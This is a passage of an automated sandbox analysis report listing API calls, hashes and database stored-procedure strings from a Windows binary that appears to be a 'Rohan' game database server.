                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Module$Program is terminated$Rohan_DBServer$\CRASH_DB.log
                                                                                      • API String ID: 0-4041277977
                                                                                      • Opcode ID: 58771d00f8c0a4233a3e6b1c37eb9deb0dd0c3502ddf8b5c8f3dd631dd68b9a9
                                                                                      • Instruction ID: 1681687f538eb0016f025922d5a9e211cd89b1ebf5fa60e43cd31cd5403b86c0
                                                                                      • Opcode Fuzzy Hash: 58771d00f8c0a4233a3e6b1c37eb9deb0dd0c3502ddf8b5c8f3dd631dd68b9a9
                                                                                      • Instruction Fuzzy Hash: 7F710774A40305AFDB54DBA0DC45FD9B7B0AF49304F1081AEE609A73A3EB74A980CF59
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004D53E8,00000118,0047F5A4,00000001,00000000,004D5028,00000008,00486273), ref: 0048220A
                                                                                      • _strlen.LIBCMT ref: 00482230
                                                                                      • _strlen.LIBCMT ref: 00482241
                                                                                      • _strlen.LIBCMT ref: 00482264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: _strlen$FileModuleName
                                                                                      • String ID: ...$0RM$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$PRM$Program: $Unknown security failure detected!
                                                                                      • API String ID: 1637341245-1219884567
                                                                                      • Opcode ID: a80d054392b97674e02cb2d7e5bcee39efde7e1580950c81df62c9d5ac344c55
                                                                                      • Instruction ID: 804ddfaaabe0197d148e06d19af882be8b0cc1d2ecac80516daea5951518c719
                                                                                      • Opcode Fuzzy Hash: a80d054392b97674e02cb2d7e5bcee39efde7e1580950c81df62c9d5ac344c55
                                                                                      • Instruction Fuzzy Hash: 8031D6719006047BDB01BB619C86E9F37A49B44318F1048AFF905AA382DE7C9B554B5D
                                                                                      APIs
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000), ref: 00411ADB
                                                                                      • GetLastError.KERNEL32(00000001,00000000,00000001,00000000), ref: 00411AFF
                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00411B36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorLastMutexStartup
                                                                                      • String ID: Another Server is running$Global\$Rohan_DBServer$Server Start fail$Server is ready on port %d (time stamp: %02d/%02d/%02d %02d:%02d:%02d )$Server started$WSAStartup error 0x%x
                                                                                      • API String ID: 2991510882-594839861
                                                                                      • Opcode ID: 1622a5f20b0b3ba946313c260304c39cea5c60ca7840b72ea86c056f6edb3f8b
                                                                                      • Instruction ID: 32af5c50b9e011e962602e1a488af3e208ff29d8126c71b25e0a7c3aabfdc6d2
                                                                                      • Opcode Fuzzy Hash: 1622a5f20b0b3ba946313c260304c39cea5c60ca7840b72ea86c056f6edb3f8b
                                                                                      • Instruction Fuzzy Hash: D981D374A41218AFDB24DB50DC85FDA7371AF49304F1044EAE609A72A2E774AE84CF5E
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN2_InsGuildWar](?,?,?,?,?,?,?,?) } ,000000FD), ref: 004285B8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00428601
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00428636
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042866E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004286A6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 004286DE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00428716
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00428753
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 0042878B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004287C3
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN2_InsGuildWar](?,?,?,?,?,?,?,?) } , xrefs: 004285AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN2_InsGuildWar](?,?,?,?,?,?,?,?) }
                                                                                      • API String ID: 0-3173555792
                                                                                      • Opcode ID: 1e7787d471105485b8e1344a0ab12a9e736afc945d43d4cb2af5f1afb448dde5
                                                                                      • Instruction ID: e6c20084e1a680b62be6530fb80a93fd7af71f11dce1ad6bbfaa0f1da1e7f4ca
                                                                                      • Opcode Fuzzy Hash: 1e7787d471105485b8e1344a0ab12a9e736afc945d43d4cb2af5f1afb448dde5
                                                                                      • Instruction Fuzzy Hash: 1961FE716443147BEB658B54CC52FAE7378EB84F18F208289F71D6E2C5DAB17B808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InitStatus] (?,?,?,?,?,?,?,?)},000000FD), ref: 0043229B
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004322DA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043230F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432347
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043237F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004323B7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004323EF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00432427
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043245F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00432497
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InitStatus] (?,?,?,?,?,?,?,?)}, xrefs: 00432292
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InitStatus] (?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-4051964823
                                                                                      • Opcode ID: 4c1da867948ff8cf816769df0d16314123c521c544b197f10b2f7c87b3f52a2a
                                                                                      • Instruction ID: f254a4f1e7116e880d6bf34a80f4c26780c8bc1414436aa1e53c91887a055a71
                                                                                      • Opcode Fuzzy Hash: 4c1da867948ff8cf816769df0d16314123c521c544b197f10b2f7c87b3f52a2a
                                                                                      • Instruction Fuzzy Hash: 9F612770A40254BBEB249B54CC56F9A73B4FB84B18F14C38AF7547E2C1D9B16D808F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsLootMoney](?,?,?,?,?,?,?,?)},000000FD), ref: 00436259
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00436298
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004362CD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436305
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043633D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436375
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004363AD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004363E5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043641D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436455
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsLootMoney](?,?,?,?,?,?,?,?)}, xrefs: 00436250
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsLootMoney](?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-857002754
                                                                                      • Opcode ID: 29ae199166e692c2301a8e47a1ffd7dc0e0739a1c8a56170f3cfadd1a9400b3f
                                                                                      • Instruction ID: c3bea9a50d6ff61d629eff969e3e49c666d47c50b4adcc6d2f35fd10f0704e42
                                                                                      • Opcode Fuzzy Hash: 29ae199166e692c2301a8e47a1ffd7dc0e0739a1c8a56170f3cfadd1a9400b3f
                                                                                      • Instruction Fuzzy Hash: D86111B4AD02177BEB249B44CC62FBA7334EB84B1CF104298F7146F2D6D7B169408B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsBaccaratInfo](?,?,?,?,?,?,?,?) } ,000000FD), ref: 0042794A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00427989
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004279BE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 004279F6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00427A2E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00427A66
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00427A9E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00427AD6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00427B0E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 00427B46
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsBaccaratInfo](?,?,?,?,?,?,?,?) } , xrefs: 00427941
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
